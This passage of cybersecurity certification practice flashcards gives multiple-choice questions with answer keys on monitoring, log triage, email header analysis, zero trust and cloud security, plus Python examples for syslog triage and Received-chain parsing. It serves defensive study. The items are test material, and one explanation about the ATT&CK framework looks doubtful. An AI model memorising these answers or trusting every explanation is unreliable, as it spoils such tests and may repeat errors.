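    "<28>Jul  4 09:33:09 fw01 kernel: link down on eth1",                              # daemon.warning
    "<0>Jul  4 09:33:10 core-sw01 system: power supply failure, shutting down",       # kern.emerg
    "<33>Jul  4 09:33:11 db01 sshd[990]: Accepted publickey for root from 10.0.0.5",    # auth.alert
    "<191>Jul  4 09:33:12 app01 app: cache miss",                                      # local7.debug
    "not a syslog line at all",
]


def decode_pri(message):
    """Return (facility, severity, body) for a message, or None if it has no valid PRI."""
    m = _PRI_RE.match(message)
    if not m:
        return None
    pri = int(m.group(1))
    if pri > 191:          # RFC 5424: facility 0..23, severity 0..7, so PRI is 0..191
        return None
    return pri // 8, pri % 8, m.group(2)


def triage(messages, max_severity=3):
    """Sort messages most-severe-first and keep those at or above the cutoff.

    Lower severity numbers are more urgent, so "at or above" means <= max_severity;
    the default keeps emergency, alert, critical and error.
    """
    decoded = []
    for msg in messages:
        d = decode_pri(msg)
        if d is None:
            continue
        facility, severity, body = d
        decoded.append({"severity": severity, "name": SEVERITY_NAMES[severity],
                        "facility": facility, "body": body})
    decoded.sort(key=lambda d: d["severity"])
    return [d for d in decoded if d["severity"] <= max_severity]


if __name__ == "__main__":
    for entry in triage(SAMPLE_MESSAGES):
        print(entry["severity"], entry["name"], entry["body"])
```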
193- Angela wants to use her network security device to detect potential beaconing behavior. Which of the following options is best suited to detecting beaconing using her network security device?
- Antivirus definitions
- File reputation
- IP reputation
- Static file analysis
IP reputation
Angela’s best choice would be to implement IP reputation to monitor for connections to known bad hosts. Antivirus definitions, file reputation, and static file analysis are all useful for detecting malware, but command‐and‐control traffic like beaconing will typically not match definitions, won’t send known files, and won’t expose files for analysis.
194- A server in the datacenter that Chris is responsible for monitoring unexpectedly connects to an offsite IP address and transfers 9 GB of data to the remote system. What type of monitoring should Chris enable to best assist him in detecting future events of this type?
- Flow logs with heuristic analysis
- SNMP monitoring with heuristic analysis
- Flow logs with signature‐based detection
- SNMP monitoring with signature‐based detection
Flow logs with heuristic analysis
Flow logs would show Chris outbound traffic flows based on remote IP addresses as well as volume of traffic, and behavioral (heuristic) analysis will help him to alert on similar behaviors. Chris should build an alert that alarms when servers in his datacenter connect to domains that are not already allowlisted and should strongly consider whether servers should be allowed to initiate outbound connections at all.
195- While reviewing his network for rogue devices, Dan notes that for three days a system with MAC address D4:BE:D9:E5:F9:18 has been connected to a switch in one of the offices in his building. What information can this provide Dan that may be helpful if he conducts a physical survey of the office?
- The operating system of the device
- The user of the system
- The vendor that built the system
- The type of device that is connected
The vendor that built the system
Dan can look up the manufacturer prefix that makes up the first part of the MAC address. In this case, Dan will discover that the system is likely a Dell, potentially making it easier for him to find the machine in the office. Network management and monitoring tools build in this identification capability, making it easier to see if unexpected devices show up on the network. Of course, if the local switch is a managed switch, he can also query it to determine what port the device is plugged into and follow the network cable to it.
196- While checking for bandwidth consumption issues, Bohai uses the ifconfig command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?
- A rootkit is concealing traffic from the Linux kernel.
- Flow logs show traffic that does not reach the system.
- ifconfig resets traffic counters at 4 GB.
- ifconfig only samples outbound traffic and will not provide accurate information.
ifconfig resets traffic counters at 4 GB.
On older and 32-bit systems the byte counters that ifconfig displays are 32-bit values that wrap at 2^32 bytes (about 4.29 GB), so a host that has sent more than that shows a misleadingly low total. That makes ifconfig an unreliable way to measure large volumes of traffic. Bohai should use a tool designed for traffic accounting, or read 64-bit counters (for example from ip -s link on a current distribution), to assess the system's bandwidth usage.
197- Vlad believes that an attacker may have added accounts and attempted to obtain extra rights on a Linux workstation. Which of the following is not a common way to check for unexpected accounts like this?
- Review /etc/passwd and /etc/shadow for unexpected accounts.
- Check /home/ for new user directories.
- Review /etc/sudoers for unexpected accounts.
- Check /etc/group for group membership issues.
Check /home/ for new user directories.
It is unlikely that skilled attackers will create a new home directory for an account they want to hide. Checking /etc/passwd and /etc/shadow for new accounts is a quick way to detect unexpected accounts, and checking both the sudoers file and membership in wheel and other high-privilege groups can help Vlad detect unexpected accounts with increased privileges.
198- Ben wants to coordinate with other organizations in the information security community to share data and current events as well as warnings of new security issues. What type of organization should he join?
- An ISAC
- A CSIRT
- A VPAC
- An IRT
An ISAC
Information sharing and analysis centers (ISACs) are information sharing and community support organizations that work within vertical industries such as energy, higher education, and other business domains. Ben may choose to have his organization join an ISAC to share and obtain information about threats and activities that are particularly relevant to what his organization does. A CSIRT is a computer security incident response team and tends to be hosted in a single organization, a VPAC is made up, and an IRT is an incident response team.
199- While investigating a spam email, Adam is able to capture headers from one of the email messages that was received. He notes that the sender was Carmen Victoria Garci. What facts can he gather from the headers shown here?
ARC-Authentication-Results: i=1; mx.google.com;
spf=pass (google.com: domain of www.fccrea.ccn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.fccrea.ccn.ne.jp
Return-Path: <www.fccrea.ccn.ne.jp>
Received: from mb4d0201.ccn.ad.jp (mb4d0201.ccn.ad.jp. [153.149.233.2])
by mx.google.com with ESMTP id d13zs157t0e64pln.176.2017.07.04.09.33.08;
Tue, 04 Jul 2017 09:33:08 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1499181188; cv=none;
d=google.com; s=arc-20160816;
b=O3BXkFLl1P6JBZ26tEjQbZ8EZlqo3xRs06J7svBcGvfbI1nIrYBZcowmww.fccrea.ccn.ne.jp
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of www.fccrea.ccn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.fccrea.ccn.ne.jp
Received: from mf-smf-uob01l.ccn.ad.jp (mf-smf-uob01l.ccn.ad.jp [153.149.233.226]) by mb4d0201.ccn.ad.jp (Postfix) with ESMTP id DEFE8A00057; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
Received: from mf-smf-uob01l.ccn.ad.jp (mf-smf-uob01l [153.149.233.226]) by mf-smf-uob01l.ccn.ad.jp (Postfix) with ESMTP id c1fcb1fc22E; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
Received: from wm-webmail1.ccn.ad.jp (wm-webmail1.ccn.ad.jp [153.149.232.82]) by mf-smf-uob01l.ccn.ad.jp (Postfix-1.4.0[patch-3.4.4]
with ESMTP id c1fcbcb2c232; Wed, 5 Jul 2017 01:33:05 +0900
Received: from wm-webmail1.ccn.ad.jp ([153.149.232.82]) by wm-ps01.wmta-uob01l with id 9gbLv0239JZEyhW019gbLv0; Tue, 04 Jul 2017 16:33:05 +0000
Received: from mzstore241.ccn.ad.jp (mz-tb241.ccn.ad.jp [180.8.112.196]) by wm-webmail1.ccn.ad.jp (Postfix) with ESMTP; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
Date: Wed, 5 Jul 2017 01:33:05 +0900 (JST)
From: Carmen Victoria Garci <"www."fccrea.ccn.ne.jp>
Reply-To: Carmen Victoria Garci <clarapgracia149@gmail.com>
Message-ID: <774131614.77452137.1499186315187.JavaMail.rootfccrea.ccn.ne.jp>
Subject: ATTENTION:THE ORDER OF THIS EMAIL.
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-Originating-IP: [197.233.216.24]
- Victoria Garci’s email address is tntexpress819@yahoo.com.
- The sender sent via Yahoo.
- The sender sent via a system in Japan.
- The sender sent via Gmail.
The sender sent via a system in Japan.
Headers can be helpful when tracking down spam, but spammers routinely forge the parts a sender controls: the From: display name and address, the Reply-To:, and even the Return-Path:. The Reply-To: here points at a Gmail address, but that only says where replies will go; it is not evidence that the message was sent through Gmail, and nothing in these headers involves Yahoo. What can be trusted is what the receiving systems added: the Received: lines show the message passing through a chain of hosts in the ccn.ad.jp domain with 153.149.x.x addresses (for example mf-smf-uob01l.ccn.ad.jp [153.149.233.226]) stamped in Japan Standard Time (+0900), and Google's SPF check passed because 153.149.233.2 is a permitted sender for the envelope domain. The X-Originating-IP header added by the webmail system, 197.233.216.24, is a further lead worth checking. Relay details below the first trusted hop can be forged, but in most cases a message like this has been sent through a compromised account or an abusable webmail system that spammers leverage to send bulk email.
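Tracing a chain like this by hand is error-prone, and the mismatched-clock problem from question 177 shows up in the same headers: the Japanese relays stamp +0900 while the receiving MX stamps -0700. The following Python is an added example, not code from the flashcards: it parses a constructed header block with the same shape as the one above (hostnames, IPs, IDs, addresses and times are made up; the example.jp/.net/.com names are placeholders), lists the Received: hops oldest-first with every timestamp normalized to UTC, and pulls out the few facts an analyst can rely on (relay hosts, the reply-to address, and the originating IP the webmail system recorded).

```python
"""Walk an email's Received: chain and normalize every hop to UTC.

Added example, not from the original flashcards. The header block below is
constructed to resemble the structure of the one in the question (a webmail
origin relayed through several hosts in one domain, then delivered to the
recipient's MX), but hostnames, IPs, IDs, addresses and times are made up.
"""
import email
import re
from datetime import datetime, timezone
from email.policy import default
from email.utils import parsedate_to_datetime

SAMPLE_HEADERS = """\
Return-Path: <sender@mail.example.jp>
Received: from relay1.example.jp (relay1.example.jp. [192.0.2.10])
        by mx.example.net with ESMTP id abc123;
        Tue, 04 Jul 2017 09:33:08 -0700 (PDT)
Received: from webmail.example.jp (webmail.example.jp [192.0.2.82])
        by relay1.example.jp (Postfix) with ESMTP id DEADBEEF;
        Wed, 5 Jul 2017 01:33:05 +0900 (JST)
Received: from store.example.jp (store.example.jp [198.51.100.7])
        by webmail.example.jp (Postfix) with ESMTP;
        Wed, 5 Jul 2017 01:33:04 +0900 (JST)
From: Someone <sender@mail.example.jp>
Reply-To: Someone <someone.else@example.com>
Subject: constructed sample
X-Originating-IP: [203.0.113.24]

"""

_HOP_RE = re.compile(
    r"from\s+(?P<from>\S+)(?:\s+\((?P<helo_info>[^)]*)\))?"
    r".*?\bby\s+(?P<by>\S+)", re.DOTALL)
_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(raw_headers):
    """Return hops oldest-first: relaying host, its IP and the UTC timestamp.

    Each relay prepends its own Received: header, so the last one in the
    message is the first hop. The date is whatever follows the final ';'.
    """
    msg = email.message_from_string(raw_headers, policy=default)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())           # unfold continuation lines
        m = _HOP_RE.search(value)
        ip_match = _IP_RE.search(value)
        date_part = value.rsplit(";", 1)[-1].strip()
        try:
            when = parsedate_to_datetime(date_part).astimezone(timezone.utc)
        except (TypeError, ValueError):
            when = None
        hops.append({
            "from": m.group("from") if m else None,
            "from_ip": ip_match.group(1) if ip_match else None,
            "by": m.group("by") if m else None,
            "utc": when.isoformat() if when else None,
        })
    return hops


def _span_seconds(chain):
    stamps = [datetime.fromisoformat(h["utc"]) for h in chain if h["utc"]]
    return int((max(stamps) - min(stamps)).total_seconds()) if len(stamps) > 1 else 0


def header_facts(raw_headers):
    """The few things an analyst can say from headers alone.

    The From: display name and address are sender-controlled; the relay chain
    and the Reply-To (where replies actually go) are what to record.
    """
    msg = email.message_from_string(raw_headers, policy=default)
    chain = received_chain(raw_headers)
    return {
        "first_relay": chain[0]["from"] if chain else None,
        "first_relay_ip": chain[0]["from_ip"] if chain else None,
        "relays": [h["by"] for h in chain],
        "reply_to": msg["Reply-To"].addresses[0].addr_spec if msg["Reply-To"] else None,
        "originating_ip": (msg["X-Originating-IP"] or "").strip("[] ") or None,
        "span_seconds": _span_seconds(chain),
    }


if __name__ == "__main__":
    for hop in received_chain(SAMPLE_HEADERS):
        print(hop)
    print(header_facts(SAMPLE_HEADERS))
```

Once every hop is in UTC the three stamps land four seconds apart, which is what a healthy relay chain looks like; a hop whose UTC time is hours off its neighbours is either a misconfigured clock, as in question 177, or a forged header.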
202- Nara is reviewing event logs to determine who has accessed a workstation after business hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?
- Login failures
- User IDs from logins
- Successful logins
- Times from logins
Successful logins
The system Nara is reviewing has only login failure logging turned on and will not capture successful logins. She cannot rely on the logs to show her who logged in but may be able to find other forensic indicators of activity, including changes in the user profile directories and application caches.
203- Profiling networks and systems can help to identify unexpected activity. What type of detection can be used once a profile has been created?
- Dynamic analysis
- Anomaly analysis
- Static analysis
- Behavioral analysis
Anomaly analysis
Profiling networks and systems will provide a baseline behavior set. A SIEM or similar system can monitor for differences or anomalies that are recorded as events. Once correlated with other events, these can be investigated and may prove to be security incidents. Dynamic and static analyses are types of code analysis, whereas behavioral, or heuristic, analysis focuses on behaviors that are indicative of an attack or other undesirable behavior. Behavioral analysis does not require a baseline; instead, it requires knowing what behavior is not acceptable.
secpol.msc
Local Security Policy editor for Windows
The Windows console used to configure local security policy, including the audit policy that determines which events (such as logon successes and failures) are written to the Security event log. It controls what gets logged; it does not analyze logs or recommend remediation.
204- Singh is attempting to diagnose high memory utilization issues on a macOS system and notices a chart showing memory pressure. What does memory pressure indicate for macOS when the graph is yellow and looks like the following image?
- Memory resources are available
- Memory resources are available but being tasked by memory management processes.
- Memory resources are in danger, and applications will be terminated to free up memory.
- Memory resources are depleted, and the disk has begun to swap.
Memory resources are available but being tasked by memory management processes.
Memory pressure is a macOS‐specific term used to describe the availability of memory resources. Yellow segments on a memory pressure chart indicate that memory resources are still available but are being tasked by memory management processes such as compression.
205- Saanvi needs to verify that his Linux system is sending system logs to his SIEM. What method can he use to verify that the events he is generating are being sent and received properly?
- Monitor traffic by running Wireshark or tcpdump on the system.
- Configure a unique event ID and send it.
- Monitor traffic by running Wireshark or tcpdump on the SIEM device.
- Generate a known event ID and monitor for it.
Generate a known event ID and monitor for it.
Saanvi simply needs to generate a known event ID that he can uniquely verify. Once he does, he can log into the SIEM and search for that event at the time he generated it to validate that his system is sending syslogs.
206- Maria wants to understand what a malware package does and executes it in a virtual machine that is instrumented using tools that will track what the program does, what changes it makes, and what network traffic it sends while allowing her to make changes on the system or to click files as needed. What type of analysis has Maria performed?
- Manual code reversing
- Interactive behavior analysis
- Static property analysis
- Dynamic code analysis
Interactive behavior analysis
Maria has performed interactive behavior analysis. This process involves executing a file in a fully instrumented environment and then tracking what occurs. Maria’s ability to interact with the file is part of the interactive element and allows her to simulate normal user interactions as needed or to provide the malware with an environment where it can interact like it would in the wild.
208- A major new botnet infection that uses a peer‐to‐peer command‐and‐control process has been released. Latisha wants to detect infected systems but knows that peer‐to‐peer communication is irregular and encrypted. If she wants to monitor her entire network for this type of traffic, what method should she use to catch infected systems?
- Build an IPS rule to detect all peer‐to‐peer communications that match the botnet’s installer signature.
- Use beaconing detection scripts focused on the command‐and‐control systems.
- Capture network flows for all hosts and use filters to remove normal traffic types.
- Immediately build a network traffic baseline and analyze it for anomalies.
Capture network flows for all hosts and use filters to remove normal traffic types.
The only solution from Latisha’s list that might work is to capture network flows, remove normal traffic, and then analyze what is left. Peer‐to‐peer botnets use rapidly changing control nodes and don’t rely on a consistent, identifiable control infrastructure, which means that traditional methods of detecting beaconing will typically fail. They also use quickly changing infection packages, making signature‐based detection unlikely to work. Finally, building a network traffic baseline after an infection will typically make the infection part of the baseline, resulting in failure to detect malicious traffic.
212- Samantha is preparing a report describing the common attack models used by advanced persistent threat actors. Which of the following is a typical characteristic of APT attacks?
- They involve sophisticated DDoS attacks.
- They quietly gather information from compromised systems.
- They rely on worms to spread.
- They use encryption to hold data hostage.
They quietly gather information from compromised systems.
Advanced persistent threats often leverage email, phishing, or a vulnerability to access systems and insert malware. Once they have gained a foothold, APT threats typically work to gain access to more systems with greater privileges. They gather data and information and then exfiltrate that information while working to hide their activities and maintain long‐term access. DDoS attacks, worms, and encryption‐based extortion are not typical APT behaviors.
214- Barb wants to detect unexpected output from the application she is responsible for managing and monitoring. What type of tool can she use to detect unexpected output effectively?
- A log analysis tool
- A behavior‐based analysis tool
- A signature‐based detection tool
- Manual analysis
A behavior‐based analysis tool
Barb can configure a behavior‐based analysis tool that can capture and analyze normal behavior for her application and then alert her when unexpected behavior occurs. Although this requires initial setup, it requires less long‐term work than constant manual monitoring, and unlike signature‐based or log analysis‐based tools, it will typically handle unexpected outputs appropriately.
216- Amanda is reviewing the security of a system that was previously compromised. She is searching for signs that the attacker has achieved persistence on the system. Which one of the following should be her highest priority to review?
- Scheduled tasks
- Network traffic
- Running processes
- Application logs
Scheduled tasks
Attackers commonly use scheduled tasks to achieve persistence. If an analyst forgets to check for scheduled tasks, attackers may leave a task scheduled that opens up a vulnerability at a later date, achieving persistence on the system.
syslog levels
- Level 0: Emergencies indicate a device shutdown due to failure.
- Level 1: Alerts signify that a temperature limit has been exceeded.
- Level 2: Critical events, such as a software failure.
- Level 3: Errors, for example, an interface down message.
- Level 4: Warnings indicate a configuration change.
- Level 5: Notifications, such as a line protocol up/down message.
- Level 6: Informational messages, such as an ACL violation.
- Level 7: Debugging messages.
219- You are looking for operating system configuration files that are stored on a Linux system. Which one of the following directories is most likely to contain those files?
- /bin
- /
- /etc
- /dev
/etc
The /etc directory normally contains system‐level configuration files. Files are generally not stored at the root level (/) of a file system. The /bin directory is used for binary executables, and the /dev directory is used for devices.
222- Matthew is reviewing a new cloud service offering that his organization plans to adopt. In this offering, a cloud provider will create virtual server instances under the multitenancy model. Each server instance will be accessible only to Matthew’s company. What cloud deployment model is being used?
- Hybrid cloud
- Public cloud
- Private cloud
- Community cloud
Public cloud
The key to answering this question is recognizing that the multitenancy model involves many different customers accessing cloud resources hosted on shared hardware. That makes this a public cloud deployment, regardless of the fact that access to a particular server instance is limited to Matthew’s company. In a private cloud deployment, only Matthew’s company would have access to any resources hosted on the same physical hardware. This is not multitenancy. There is no indication that Matthew’s organization is combining resources of public and private cloud computing, which would be a hybrid cloud, or that the resource use is limited to members of a particular group, which would be a community cloud.
223- In a zero‐trust network architecture, what criteria is used to make trust decisions?
- Identity of a user or device
- IP address
- Network segment
- VLAN membership
Identity of a user or device
Zero‐trust network architectures make trust decisions based upon the identity of the user or device making the request. They do not make trust decisions based upon network location characteristics, such as an IP address, VLAN assignment, or network segment.
224- Lynn’s organization is moving toward a secure access service edge (SASE) approach to security. Which one of the following technologies is least likely to be included in a SASE architecture?
- NGFW
- CASB
- Hypervisor
- WAN
Hypervisor
Secure access service edge (SASE) approaches to network security seek to implement zero‐trust networking in a way that integrates cloud security services. Next‐generation firewalls (NGFWs), cloud access security brokers (CASBs), and wide area network (WAN) connections are all critical components of SASE deployments. Hypervisors are used to create virtual machines, and, while they may be leveraged in a SASE environment, they are not themselves a direct part of the SASE architecture.
231- What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?
- DHS
- SANS
- CERTS
- ISACs
ISACs
The U.S. government created information sharing and analysis centers (ISACs). ISACs help infrastructure owners and operators share threat information, and they provide tools and assistance to their members.
233- The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
- The threat actor
- The targeting method
- The attack vector
- The organizational weakness
The attack vector
The ATT&CK framework defines the attack vector as the specifics behind how the adversary would attack the target. You don’t have to memorize ATT&CK to pass the exam, but you should be prepared to encounter questions that you need to narrow down based on what knowledge you do have. Here you can rule out the threat actor and targeting method and then decide between the attack vector and organizational weakness.
235- Brian is selecting a CASB for his organization, and he would like to use an approach that interacts with the cloud provider directly. Which CASB approach is most appropriate for his needs?
- Inline CASB
- Outsider CASB
- Comprehensive CASB
- API‐based CASB
API‐based CASB
API‐based CASB solutions interact directly with the cloud provider through the provider’s API. Inline CASB solutions intercept requests between the user and the provider. Outsider and comprehensive are not categories of CASB solutions.
Inline CASB
Inline CASB solutions intercept requests between the user and the provider
API‐based CASB
API‐based CASB solutions interact directly with the cloud provider through the provider’s API
236- Sherry is deploying a zero‐trust network architecture for her organization. In this approach, which one of the following characteristics would be least important in validating a login attempt?
- User identity
- IP address
- Geolocation
- Nature of requested access
IP address
The defining characteristic of zero‐trust network architecture is that trust decisions are not based on network location, such as IP address. It is appropriate to use other characteristics, such as a user’s identity, the nature of the requested access, and the user’s geographic (not network!) location.
237- Lisa wants to integrate with a cloud identity provider that uses OAuth 2.0, and she wants to select an appropriate authentication framework. Which of the following best suits her needs?
- OpenID Connect
- SAML
- RADIUS
- Kerberos
OpenID Connect
OpenID Connect is an authentication layer that works with OAuth 2.0 as its underlying authorization framework. It has been widely adopted by cloud service providers and is widely supported. SAML, RADIUS, and Kerberos are alternative authentication technologies but do not have the same level of seamless integration with OAuth.
239- Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?
- Vulnerability feed
- IoC
- TTP
- RFC
IoC
Specific details of attacks that may be used to identify compromises are known as indicators of compromise (IoC). This data may also be described as an adversary tool, tactic, or procedure (TTP), but the fact that it is a set of file signatures makes it more closely match the definition of an IoC.
241- Brian recently joined an organization that runs the majority of its services on a virtualization platform located in its own datacenter but also leverages an IaaS provider for hosting its web services and an SaaS email system. What term best describes the type of cloud environment this organization uses?
- Public cloud
- Dedicated cloud
- Private cloud
- Hybrid cloud
Hybrid cloud
The scenario describes a mix of public cloud and private cloud services. This is an example of a hybrid cloud environment.
FDE
full disk encryption (DAH!)
249- Which of the following measures is not commonly used to assess threat intelligence?
- Timeliness
- Detail
- Accuracy
- Relevance
Detail
While higher levels of detail can be useful, it isn’t a common measure used to assess threat intelligence. Instead, the timeliness, accuracy, and relevance of the information are considered critical to determining whether you should use the threat information.
250- Sara has been asked to explain to her organization how an endpoint detection and response (EDR) system could help the organization. Which of the following functions is not a typical function for an EDR system?
- Endpoint data collection and central analysis
- Automated responses to threats
- Forensic analysis to help with threat response and detection
- Cloud and network data collection and central analysis
Cloud and network data collection and central analysis
Endpoint detection and response (EDR) tools do not collect data such as network traffic or cloud infrastructure. They do collect data from endpoints and centralize it for analysis and response, including forensic and threat detection capabilities.